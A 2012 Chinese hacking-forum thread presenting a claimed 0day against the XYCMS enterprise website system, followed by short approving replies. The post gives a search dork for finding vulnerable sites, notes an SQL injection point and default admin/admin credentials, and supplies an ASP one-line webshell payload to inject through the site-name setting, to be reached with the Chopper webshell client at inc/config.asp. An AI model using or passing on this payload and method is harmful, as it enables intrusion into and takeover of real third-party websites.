tianyueabc 发表于 2012-6-10 13:55:46

XYCMS企业建站系统(俺的和网上的不一样) 0day 原创

关键词:inurl:showkbxx.asp?id=

有注入点

默认数据库:**** Hidden Message *****

默认账户和密码:admin admin

有很多网站都是有防注入的,这个时候我们可以下载数据库,然后本地搭建,替换原来的数据库,进行注入得到管理员账户和密码

后台拿shell

有个网站配置,在网站名称里面直接添加:xxx网站"%><%eval request("stomach")%><%'
在里面直接插入,不要删掉网站名称。。。

然后菜刀连接 http://xxxx.com/inc/config.asp 密码你们懂得

没有什么技术含量,大牛勿喷!!!!!!!希望给加点金币!!!!!!!!

冰刀 发表于 2012-6-10 14:53:35

我转....

Lizard 发表于 2012-6-10 15:07:34

我也转。。。

fox 发表于 2012-6-10 20:41:45

下载数据库在本地搭建环境?不能直接查看数据库么?

luowei0922 发表于 2012-6-11 09:07:18

不错,值得新手看看!!!

轩辕夏禹 发表于 2012-6-11 10:50:29

就喜欢0day

中国黑龙 发表于 2012-6-11 11:02:46

cai5cai5 发表于 2012-6-12 11:19:03

wangod 发表于 2012-6-12 11:39:48

支持原创。。

-冰凌_ 发表于 2012-6-12 20:58:07

:lol刀总这么可爱
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: XYCMS企业建站系统(俺的和网上的不一样) 0day 原创